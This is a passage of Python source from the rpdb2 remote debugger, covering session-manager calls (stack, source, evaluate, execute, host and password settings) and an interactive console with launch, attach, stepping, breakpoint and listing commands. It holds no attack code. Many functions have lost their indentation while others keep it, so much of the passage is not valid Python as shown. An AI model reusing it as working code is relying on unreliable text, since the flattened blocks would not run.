    proxy = self.getSession().getProxy()
    return proxy.get_stack(tid_list, fAll, in_analyze_mode)
def get_source_file(self, filename, lineno, nlines):
    """Fetch nlines of filename around lineno from the debuggee."""
    assert(is_unicode(filename))
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    return proxy.get_source_file(filename, lineno, nlines, frame, in_analyze_mode)
def get_source_lines(self, nlines, fAll):
    """Fetch source lines around the current position from the debuggee."""
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    return proxy.get_source_lines(nlines, fAll, frame, in_analyze_mode)
def get_thread_list(self):
    """Return (current_thread_id, thread_list) from the debuggee."""
    proxy = self.getSession().getProxy()
    (current_thread_id, thread_list) = proxy.get_thread_list()
    return (current_thread_id, thread_list)
def set_thread(self, tid):
    """Focus tid in the debuggee, resetting cached frame indexes first."""
    self.reset_frame_indexes(None)
    proxy = self.getSession().getProxy()
    proxy.set_thread(tid)
def get_namespace(self, nl, filter_level, repr_limit):
    """Fetch namespace (variable) data for the current frame."""
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    return proxy.get_namespace(nl, filter_level, frame, in_analyze_mode, repr_limit, self.m_encoding, self.m_fraw)
def evaluate(self, expr, fclear_completions = True):
    """Evaluate expr in the debuggee's current frame.

    Returns (value, warning, error); by default also invalidates the
    cached completion lists.
    """
    assert(is_unicode(expr))
    self.__verify_attached()
    self.__verify_broken()
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    (value, warning, error) = proxy.evaluate(expr, frame, in_analyze_mode, self.m_encoding, self.m_fraw)
    if fclear_completions:
        self.m_completions.clear()
    return (value, warning, error)
def execute(self, suite, frame_index=None):
    """Execute a statement suite in the debuggee's current frame.

    Returns (warning, error) and invalidates cached completions.
    """
    assert(is_unicode(suite))
    self.__verify_attached()
    self.__verify_broken()
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    (warning, error) = proxy.execute(suite, frame, in_analyze_mode, self.m_encoding)
    self.m_completions.clear()
    return (warning, error)
def set_encoding(self, encoding, fraw):
    """Select the encoding/raw-repr mode used for debuggee data; fires
    an encoding event and refreshes the session when attached."""
    if (encoding, fraw) == (self.m_encoding, self.m_fraw):
        return
    self.m_encoding = encoding
    self.m_fraw = fraw
    self.m_event_dispatcher.fire_event(CEventEncoding(encoding, fraw))
    if self.__is_attached():
        self.refresh()
def get_encoding(self):
    """Return the current encoding settings as (encoding, fraw)."""
    return (self.m_encoding, self.m_fraw)
def set_host(self, host):
    """
    Set the host that is scanned/attached by this manager.

    Validates that the name is pure ASCII and resolvable; falls back to
    the loopback address when LOCALHOST itself fails to resolve.
    """
    self.__verify_unattached()
    try:
        # Reject anything that is not representable as ASCII.
        if not is_unicode(host):
            host = host.decode('ascii')
        host.encode('ascii')
    except:
        raise BadArgument
    host = as_string(host, 'ascii')
    try:
        socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM)
    except socket.gaierror:
        if host.lower() != LOCALHOST:
            raise
        #
        # Work-around for gaierror: (-8, 'Servname not supported for ai_socktype')
        #
        return self.set_host(LOOPBACK)
    self.m_host = host
    self.m_server_list_object = CServerList(host)
def get_host(self):
    """Return the configured host as a unicode string."""
    return as_unicode(self.m_host)
def calc_server_list(self):
if self.m_rpdb2_pwd is None:
raise UnsetPassword
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
server_list = self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors)
return (server_list, errors)
def get_server_info(self):
return self.getSession().getServerInfo()
def complete_expression(self, expr):
match = re.search(
r'(?P<unsupported> \.)? (?P<match> ((?P<scope> (\w+\.)* \w+) \.)? (?P<complete>\w*) $)',
expr,
re.U | re.X
)
if match == None:
raise BadArgument
d = match.groupdict()
unsupported, scope, complete = (d['unsupported'], d['scope'], d['complete'])
if unsupported != None:
raise BadArgument
if scope == None:
_scope = as_unicode('list(globals().keys()) + list(locals().keys()) + list(_RPDB2_builtins.keys())')
else:
_scope = as_unicode('dir(%s)' % scope)
if not _scope in self.m_completions:
(v, w, e) = self.evaluate(_scope, fclear_completions = False)
if w != '' or e != '':
print_debug('evaluate() returned the following warning/error: %s' % w + e)
return (expr, [])
cl = list(set(eval(v)))
if '_RPDB2_builtins' in cl:
cl.remove('_RPDB2_builtins')
self.m_completions[_scope] = cl
completions = [attr for attr in self.m_completions[_scope] if attr.startswith(complete)]
completions.sort()
if complete == '':
prefix = expr
else:
prefix = expr[:-len(complete)]
return (prefix, completions)
def _reset_frame_indexes(self, event):
self.reset_frame_indexes(None)
def reset_frame_indexes(self, event):
try:
self.m_state_manager.acquire()
if event is None:
self.__verify_broken()
elif self.m_state_manager.get_state() in [STATE_BROKEN, STATE_ANALYZE]:
return
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions.clear()
finally:
self.m_state_manager.release()
def set_stack_depth(self, event):
try:
self.m_state_manager.acquire()
self.__verify_broken()
self.m_stack_depth = event.m_stack_depth
self.m_stack_depth_exception = event.m_stack_depth_exception
self.m_frame_index = min(self.m_frame_index, self.m_stack_depth - 1)
self.m_frame_index_exception = min(self.m_frame_index_exception, self.m_stack_depth_exception - 1)
finally:
self.m_state_manager.release()
    def set_frame_index(self, frame_index):
        """Select a stack frame (clamped to the stack depth); returns the
        index actually selected. In analyze mode the exception-stack index
        is the one updated.
        """
        try:
            self.m_state_manager.acquire()
            self.__verify_broken()
            if (frame_index < 0) or (self.m_stack_depth is None):
                # Nothing sensible to set; report the current index instead.
                return self.get_frame_index(fLock = False)
            if self.m_state_manager.get_state() == STATE_ANALYZE:
                self.m_frame_index_exception = min(frame_index, self.m_stack_depth_exception - 1)
                si = self.m_frame_index_exception
            else:
                self.m_frame_index = min(frame_index, self.m_stack_depth - 1)
                si = self.m_frame_index
        finally:
            self.m_state_manager.release()
        # Notifications are fired only after the state lock is released.
        event = CEventStackFrameChange(si)
        self.m_event_dispatcher.fire_event(event)
        event = CEventNamespace()
        self.m_event_dispatcher.fire_event(event)
        return si
def get_frame_index(self, fLock = True):
try:
if fLock:
self.m_state_manager.acquire()
self.__verify_attached()
if self.m_state_manager.get_state() == STATE_ANALYZE:
return self.m_frame_index_exception
else:
return self.m_frame_index
finally:
if fLock:
self.m_state_manager.release()
def set_analyze(self, fAnalyze):
try:
self.m_state_manager.acquire()
if fAnalyze and (self.m_state_manager.get_state() != STATE_BROKEN):
raise DebuggerNotBroken
if (not fAnalyze) and (self.m_state_manager.get_state() != STATE_ANALYZE):
return
state = [STATE_BROKEN, STATE_ANALYZE][fAnalyze]
self.m_state_manager.set_state(state, fLock = False)
finally:
self.m_state_manager.release()
self.refresh()
def getSession(self):
self.__verify_attached()
return self.m_session
def get_state(self):
return as_unicode(self.m_state_manager.get_state())
def set_password(self, _rpdb2_pwd):
assert(is_unicode(_rpdb2_pwd))
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = _rpdb2_pwd
finally:
self.m_state_manager.release()
def set_random_password(self):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = generate_random_password()
self.m_printer(STR_RANDOM_PASSWORD)
finally:
self.m_state_manager.release()
def get_password(self):
return self.m_rpdb2_pwd
def set_remote(self, fAllowRemote):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_fAllowRemote = fAllowRemote
finally:
self.m_state_manager.release()
def get_remote(self):
return self.m_fAllowRemote
def set_environ(self, envmap):
self.m_environment = []
try:
for k, v in envmap:
k = as_unicode(k, fstrict = True)
v = as_unicode(v, fstrict = True)
self.m_environment.append((k, v))
except:
raise BadArgument
def get_environ(self):
return self.m_environment
    def stop_debuggee(self):
        """Stop the debuggee and detach.

        Breakpoints are saved on a best-effort basis first; the state is
        always driven to STATE_DETACHED even if the stop request fails.
        """
        self.__verify_attached()
        try:
            # Best effort: a failure to save breakpoints must not block the stop.
            self.save_breakpoints()
        except:
            print_debug_exception()
            pass
        self.m_printer(STR_ATTEMPTING_TO_STOP)
        self.m_printer(STR_ATTEMPTING_TO_DETACH)
        self.m_state_manager.set_state(STATE_DETACHING)
        # Stop event delivery before tearing down the session.
        self.__stop_event_monitor()
        try:
            self.getSession().getProxy().stop_debuggee()
        finally:
            # Unconditional cleanup: detached state, no session.
            self.m_state_manager.set_state(STATE_DETACHED)
            self.m_session = None
            self.m_printer(STR_DETACH_SUCCEEDED)
class CConsoleInternal(cmd.Cmd, threading.Thread):
    def __init__(self, session_manager, stdin = None, stdout = None, fSplit = False):
        # Interactive debugger console: a cmd.Cmd command loop running on its
        # own thread. fSplit is set when input and output are split (e.g. an
        # embedding GUI); it disables raw input and the visible prompt.
        global g_fDefaultStd
        cmd.Cmd.__init__(self, stdin = stdin, stdout = stdout)
        threading.Thread.__init__(self)
        self.fAnalyzeMode = False
        self.fPrintBroken = True
        self.m_filename = as_unicode('')
        self.m_completion_thread = None
        self.use_rawinput = [1, 0][fSplit]
        self.m_fSplit = fSplit
        self.prompt = [[CONSOLE_PROMPT, CONSOLE_PROMPT_ANALYZE][self.fAnalyzeMode], ""][fSplit]
        self.intro = CONSOLE_INTRO
        if fSplit:
            self.intro += '\n'
        #thread_set_daemon(self, True)
        self.m_session_manager = session_manager
        self.m_session_manager.set_printer(self.printer)
        # Subscribe to session events so mode changes are echoed to the user.
        event_type_dict = {CEventState: {}}
        self.m_session_manager.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
        event_type_dict = {CEventSynchronicity: {}}
        self.m_session_manager.register_callback(self.synchronicity_handler, event_type_dict, fSingleUse = False)
        event_type_dict = {CEventTrap: {}}
        self.m_session_manager.register_callback(self.trap_handler, event_type_dict, fSingleUse = False)
        event_type_dict = {CEventForkMode: {}}
        self.m_session_manager.register_callback(self.fork_mode_handler, event_type_dict, fSingleUse = False)
        self.m_last_source_line = None
        self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
        self.m_fAddPromptBeforeMsg = False
        self.m_eInLoop = threading.Event()
        # An initial empty command makes the loop run precmd() early, which
        # sets m_eInLoop (printer() waits on it).
        self.cmdqueue.insert(0, '')
        self.m_stdout = self.stdout
        self.m_encoding = detect_encoding(self.stdin)
        g_fDefaultStd = (stdin == None)
        if self.use_rawinput:
            # Make '.' a completer delimiter so attribute completion works.
            try:
                import readline
                cd = readline.get_completer_delims()
                if not '.' in cd:
                    readline.set_completer_delims(cd + '.')
            except:
                pass
def set_filename(self, filename):
assert(is_unicode(filename))
self.m_filename = filename
def precmd(self, line):
line = as_unicode(line, self.m_encoding)
self.m_fAddPromptBeforeMsg = True
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.set()
time.sleep(0.01)
if not line.strip():
return line
command = line.split(' ', 1)[0].split(SOURCE_MORE, 1)[0].split(SOURCE_LESS, 1)[0]
if command not in ['list', 'l']:
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
return line
def postcmd(self, stop, line):
self.m_fAddPromptBeforeMsg = False
return stop
def onecmd(self, line):
"""
Default Error handling and reporting of session manager errors.
"""
try:
return cmd.Cmd.onecmd(self, line)
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
return False
def default(self, line):
"""
Called on an input line when the command prefix is not recognized.
Over-rides base method at cmd.py.
"""
self.printer(STR_BAD_SYNTAX % line)
def emptyline(self):
pass
    def complete(self, text, state):
        """
        Return the next possible completion for 'text'.
        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if self.use_rawinput:
            #
            # Import cmd to workaround a strange bug in Python.
            #
            import cmd
            return cmd.Cmd.complete(self, text, state)
        #
        # Without rawinput assuming text includes entire buffer up to cursor.
        #
        try:
            if state != 0:
                # Follow-up calls just walk the match list cached at state 0.
                return self.completion_matches[state]
            if not ' ' in text:
                # Still typing the command word itself.
                self.completion_matches = self.completenames(text)
                return self.completion_matches[state]
            # NOTE: this rebinds the local name 'cmd' (shadowing the module,
            # which is why the module is re-imported above when needed).
            cmd, args, foo = self.parseline(text)
            if cmd == '' or not hasattr(self, 'complete_' + cmd):
                self.completion_matches = self.completedefault(text)
                return self.completion_matches[state]
            compfunc = getattr(self, 'complete_' + cmd)
            self.completion_matches = compfunc(text)
            return self.completion_matches[state]
        except IndexError:
            # No completion at this index.
            return None
    def complete_launch(self, text, line = None, begidx = None, endidx = None):
        # Filename completion for the 'launch' command: complete Python
        # scripts and directories from the typed path, or from $PATH when
        # no directory component was given.
        if line != None and endidx != None:
            # Treat everything up to the cursor as the text to complete.
            text = line[:endidx]
        if text.endswith(' '):
            dn, bn = '', ''
        else:
            path = text.split()[-1]
            dn, bn = os.path.split(path)
        prefix = text
        if bn != '':
            prefix = prefix[:-len(bn)]
        if dn == '' and bn.startswith('~'):
            # '~user' form: offer the (expanded or literal) name as the
            # single candidate.
            if bn == os.path.expanduser(bn):
                c = text
            else:
                c = os.path.join(text, '')
            if begidx != None:
                c = c[begidx:]
            return [c]
        pl = [dn]
        if dn == '':
            # No directory typed: search the executable path as well.
            pl += os.environ['PATH'].split(os.pathsep)
        fl = []
        for p in pl:
            if p == '':
                p = '.'
            try:
                ep = os.path.expanduser(p)
                l = os.listdir(ep)
                for f in l:
                    if not f.startswith(bn):
                        continue
                    root, ext = os.path.splitext(f)
                    if not ext in ['.py', '.pyw', '']:
                        continue
                    if os.path.isdir(os.path.join(ep, f)):
                        # Directories get a trailing separator so completion
                        # can continue into them.
                        c = prefix + os.path.join(f, '')
                    else:
                        c = prefix + f
                    if begidx != None:
                        c = c[begidx:]
                    fl.append(c)
            except:
                # Unreadable directory: skip it.
                pass
        fs = set(fl)
        cl = list(fs)
        cl.sort()
        return cl
def complete_eval(self, text, line = None, begidx = None, endidx = None):
t = self.m_completion_thread
if t != None and thread_is_alive(t):
return []
self.m_completion_thread = None
result = [('', [])]
if line != None and endidx != None:
text = line[:endidx]
t = threading.Thread(target = self.complete_expression_job, args = (text, result))
t.start()
t.join(PING_TIMEOUT)
if thread_is_alive(t):
self.m_completion_thread = t
return []
(prefix, completions) = result[-1]
if begidx != None:
prefix = prefix[begidx:]
ce = [prefix + c for c in completions]
return ce
complete_v = complete_eval
complete_exec = complete_eval
complete_x = complete_exec
def complete_expression_job(self, text, result):
try:
(prefix, completions) = self.m_session_manager.complete_expression(text)
result.append((prefix, completions))
except:
print_debug_exception()
def run(self):
self.cmdloop()
def __get_str_wrap(self, _str, max_len):
if len(_str) <= max_len and not '\n' in _str:
return (_str, '')
s = _str[: max_len]
i = s.find('\n')
if i == -1:
i = s.rfind(' ')
if i == -1:
return (s, _str[max_len:])
return (_str[: i], _str[i + 1:])
def printer(self, _str):
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.wait()
fAPBM = self.m_fAddPromptBeforeMsg
prefix = ['', self.prompt.strip('\n')][fAPBM] + CONSOLE_PRINTER
suffix = '\n' + [self.prompt.strip('\n'), ''][fAPBM]
s = _str
while s != '':
s, _s = self.__get_str_wrap(s, CONSOLE_WRAP_INDEX - len(prefix + suffix))
_print(prefix + s + suffix, self.m_stdout, feol = False)
s = _s
self.m_stdout.flush()
def print_notice(self, notice):
nl = notice.split('\n')
i = 0
for l in nl:
_print(l, self.m_stdout)
i += 1
if i % PRINT_NOTICE_LINES_PER_SECTION == 0:
_print("\n" + PRINT_NOTICE_PROMPT, self.m_stdout, feol = False)
response = self.stdin.readline()
if response != '\n':
break
_print('', self.m_stdout)
def event_handler(self, event):
state = event.m_state
if (state == STATE_BROKEN) and self.fPrintBroken:
self.fPrintBroken = False
self.printer(STR_DEBUGGER_HAS_BROKEN)
return
if (state != STATE_ANALYZE) and self.fAnalyzeMode:
self.fAnalyzeMode = False
self.prompt = [CONSOLE_PROMPT, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_OFF)
return
if (state == STATE_ANALYZE) and not self.fAnalyzeMode:
self.fAnalyzeMode = True
self.prompt = [CONSOLE_PROMPT_ANALYZE, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_ON)
return
def synchronicity_handler(self, event):
self.printer(STR_SYNCHRONICITY_MODE % str(event.m_fsynchronicity))
def trap_handler(self, event):
self.printer(STR_TRAP_MODE_SET % str(event.m_ftrap))
def fork_mode_handler(self, event):
x = [FORK_PARENT, FORK_CHILD][event.m_ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][event.m_ffork_auto]
self.printer(STR_FORK_MODE_SET % (x, y))
def do_launch(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
if arg[:2] == '-k':
fchdir = False
_arg = arg[2:].strip()
else:
fchdir = True
_arg = arg
self.fPrintBroken = True
try:
self.m_session_manager.launch(fchdir, _arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_restart(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.restart()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_attach(self, arg):
if arg == '':
return self.__scripts(arg)
self.fPrintBroken = True
try:
self.m_session_manager.attach(arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def __scripts(self, arg):
if self.m_session_manager.get_password() is None:
_print(STR_PASSWORD_MUST_BE_SET, self.m_stdout)
return
host = self.m_session_manager.get_host()
_print(STR_SCRIPTS_CONNECTING % host, self.m_stdout)
(server_list, errors) = self.m_session_manager.calc_server_list()
if server_list == []:
_print(STR_SCRIPTS_NO_SCRIPTS % host, self.m_stdout)
return
try:
spid = self.m_session_manager.get_server_info().m_pid
except NotAttached:
spid = None
_print(STR_SCRIPTS_TO_DEBUG % host, self.m_stdout)
for s in server_list:
m = ['', SYMBOL_MARKER][spid == s.m_pid]
_print(' %1s %-5d %s' % (m, s.m_pid, s.m_filename), self.m_stdout)
def do_detach(self, arg):
if not arg == '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.detach()
def do_host(self, arg):
if arg == '':
host = self.m_session_manager.get_host()
_print(host, self.m_stdout)
return
try:
self.m_session_manager.set_host(arg)
except socket.gaierror:
e = sys.exc_info()[1]
self.printer(MSG_ERROR_HOST_TEXT % (arg, e))
def do_break(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.request_break()
do_b = do_break
    def __parse_bp_arg(self, arg, fAllowExpr = True):
        # Parse a breakpoint argument of the form
        # [filename<sep>](lineno|scope)[<eval-sep>expr]
        # into (filename, scope, lineno, expr). Exactly one of scope/lineno
        # is meaningful: lineno is 0 when a scope name was given.
        _args = arg.split(BP_EVAL_SEP)
        if (len(_args) > 1) and (not fAllowExpr):
            # A conditional expression was given where none is allowed.
            raise BadArgument
        if len(_args) > 1:
            expr = _args[1].strip()
        else:
            expr = ''
        # Split on the LAST filename separator so earlier separators stay
        # part of the filename (presumably drive letters like 'c:\...' —
        # depends on the value of BP_FILENAME_SEP).
        rf = _args[0].rfind(BP_FILENAME_SEP)
        if rf == -1:
            args = [_args[0]]
        else:
            args = [_args[0][:rf], _args[0][rf + 1:]]
        filename = ['', args[0]][len(args) > 1]
        if filename in [None, '']:
            # No filename given; default to the current script.
            filename = self.m_filename
        try:
            lineno = int(args[-1])
            scope = ''
        except ValueError:
            # Not a number, so it names a scope (function/method).
            lineno = 0
            scope = args[-1].strip()
        return (filename, scope, lineno, expr)
def do_go(self, arg):
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
if arg != '':
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = False)
self.fPrintBroken = True
self.m_session_manager.request_go_breakpoint(filename, scope, lineno)
return
self.fPrintBroken = True
self.m_session_manager.request_go()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
do_g = do_go
def do_step(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_step()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_s = do_step
def do_next(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_next()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_n = do_next
def do_return(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_return()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_r = do_return
def do_jump(self, arg):
try:
lineno = int(arg)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.request_jump(lineno)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_j = do_jump
def do_bp(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = True)
self.m_session_manager.set_breakpoint(filename, scope, lineno, True, expr)
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except SyntaxError:
self.printer(STR_BAD_EXPRESSION % expr)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_be(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.enable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bd(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.disable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bc(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.delete_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bl(self, arg):
bpl = self.m_session_manager.get_breakpoints()
bplk = list(bpl.keys())
bplk.sort()
_print(STR_BREAKPOINTS_LIST, self.m_stdout)
for id in bplk:
bp = bpl[id]
if bp.m_expr:
expr = bp.m_expr
else:
expr = ''
try:
expr.encode('ascii', 'strict')
encoding = ''
except:
encoding = bp.m_encoding
scope = bp.m_scope_fqn
if scope.startswith(MODULE_SCOPE + '.'):
scope = scope[len(MODULE_SCOPE) + 1:]
elif scope.startswith(MODULE_SCOPE2 + '.'):
scope = scope[len(MODULE_SCOPE2) + 1:]
state = [STATE_DISABLED, STATE_ENABLED][bp.isEnabled()]
s = STR_BREAKPOINTS_TEMPLATE % (id, state, bp.m_lineno, clip_filename(bp.m_filename, 45), calc_suffix(scope, 45), calc_prefix(expr, 50), encoding)
_print(s.rstrip() + '\n', self.m_stdout)
def do_save(self, arg):
self.m_session_manager.save_breakpoints(arg)
_print(STR_BREAKPOINTS_SAVED, self.m_stdout)
return
def do_load(self, arg):
try:
self.m_session_manager.load_breakpoints(arg)
_print(STR_BREAKPOINTS_LOADED, self.m_stdout)
return
except IOError:
error = [STR_BREAKPOINTS_FILE_NOT_FOUND, STR_BREAKPOINTS_NOT_FOUND][arg == '']
self.printer(error)
    def do_stack(self, arg):
        # Display stack traces; arg is a whitespace-separated list of thread
        # ids, SYMBOL_ALL for all threads, or empty for the current thread.
        if self.fAnalyzeMode and (arg != ''):
            self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
            return
        try:
            tid_list = []
            fAll = (arg == SYMBOL_ALL)
            if not fAll:
                sid_list = arg.split()
                tid_list = [int(sid) for sid in sid_list]
            sl = self.m_session_manager.get_stack(tid_list, fAll)
            if len(sl) == 0:
                self.printer(STR_NO_THREADS_FOUND)
                return
            frame_index = self.m_session_manager.get_frame_index()
            m = None
            for st in sl:
                s = st.get(DICT_KEY_STACK, [])
                tid = st.get(DICT_KEY_TID, 0)
                fBroken = st.get(DICT_KEY_BROKEN, False)
                fCurrent = st.get(DICT_KEY_CURRENT_TID, False)
                if m is not None:
                    # Blank line between consecutive stack traces.
                    _print('', self.m_stdout)
                _print(STR_STACK_TRACE % tid, self.m_stdout)
                i = 0
                while i < len(s):
                    # Walk the stack innermost-frame first.
                    e = s[-(1 + i)]
                    marker = [SOURCE_STATE_UNBROKEN, SYMBOL_MARKER][fBroken]
                    if fCurrent:
                        # Mark the focused frame of the current thread ...
                        m = ['', marker][i == frame_index]
                    else:
                        # ... and the innermost frame of any other thread.
                        m = ['', marker][i == 0]
                    _print(' %1s %5d %-28s %4d %s' % (m, i, calc_suffix(e[0], 28), e[1], calc_prefix(e[2], 20)), self.m_stdout)
                    i += 1
        except ValueError:
            self.printer(STR_BAD_ARGUMENT)
        except (NoExceptionFound, NoThreads):
            self.m_session_manager.report_exception(*sys.exc_info())
    do_k = do_stack
    def do_list(self, arg):
        # List source code. arg forms: [filename:][lineno|'+'|'-'|'^'|'*']
        # [, nlines] — where '+'/'-' page forward/back from the previous
        # listing, '^' (SOURCE_ENTIRE_FILE) lists the whole file, '*'
        # (SYMBOL_ALL) lists around the current line of every thread, and
        # an empty spec lists around the current frame line.
        rf = arg.rfind(BP_FILENAME_SEP)
        if rf == -1:
            _filename = ''
            __args2 = arg
        else:
            _filename = arg[:rf]
            __args2 = arg[rf + 1:]
        _args = __args2.split(BP_EVAL_SEP)
        fAll = (_args[0] == SYMBOL_ALL)
        fMore = (_args[0] == SOURCE_MORE)
        fLess = (_args[0] == SOURCE_LESS)
        fEntire = (_args[0] == SOURCE_ENTIRE_FILE)
        fCurrent = (_args[0] == '')
        fLine = False
        l = 1
        try:
            if len(_args) > 1:
                nlines = int(_args[1])
            else:
                nlines = self.m_last_nlines
            if not (fAll or fMore or fLess or fEntire or fCurrent):
                # The first token must then be an explicit line number.
                l = int(_args[0])
                fLine = True
        except ValueError:
            self.printer(STR_BAD_ARGUMENT)
            return
        if self.fAnalyzeMode and fAll:
            self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
            return
        # Continue paging relative to the previous 'list' command.
        if fMore and self.m_last_source_line:
            l = max(1, self.m_last_source_line + self.m_last_nlines // 2 + 1)
            fLine = True
        elif fLess and self.m_last_source_line:
            l = max(1, self.m_last_source_line - (self.m_last_nlines - 1) // 2 - nlines)
            fLine = True
        try:
            if fEntire:
                # (-1, -1) requests the whole file.
                r = [self.m_session_manager.get_source_file(_filename, -1, -1)]
            elif fLine:
                r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
            elif _filename != '':
                r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
            else:
                r = self.m_session_manager.get_source_lines(nlines, fAll)
            if len(r) == 0:
                self.printer(STR_NO_THREADS_FOUND)
                return
            m = None
            for d in r:
                tid = d.get(DICT_KEY_TID, 0)
                filename = d.get(DICT_KEY_FILENAME, '')
                breakpoints = d.get(DICT_KEY_BREAKPOINTS, {})
                source_lines = d.get(DICT_KEY_LINES, [])
                first_lineno = d.get(DICT_KEY_FIRST_LINENO, 0)
                if len(r) == 1 and first_lineno != 0:
                    l = first_lineno
                fBroken = d.get(DICT_KEY_BROKEN, False)
                frame_event = d.get(DICT_KEY_EVENT, '')
                frame_lineno = d.get(DICT_KEY_FRAME_LINENO, 0)
                if m is not None:
                    # Blank line between listings for different threads.
                    _print('', self.m_stdout)
                _print(STR_SOURCE_LINES % (tid, filename), self.m_stdout)
                for i, line in enumerate(source_lines):
                    lineno = first_lineno + i
                    # Frame-line marker: encodes the trace event type.
                    # NOTE(review): an unrecognized frame_event leaves 'm'
                    # at its previous value here — presumably unreachable;
                    # confirm against the debuggee's event names.
                    if lineno != frame_lineno:
                        m = ''
                    elif not fBroken:
                        m = SOURCE_STATE_UNBROKEN + SYMBOL_MARKER
                    elif frame_event == 'call':
                        m = SOURCE_EVENT_CALL + SYMBOL_MARKER
                    elif frame_event == 'line':
                        m = SOURCE_EVENT_LINE + SYMBOL_MARKER
                    elif frame_event == 'return':
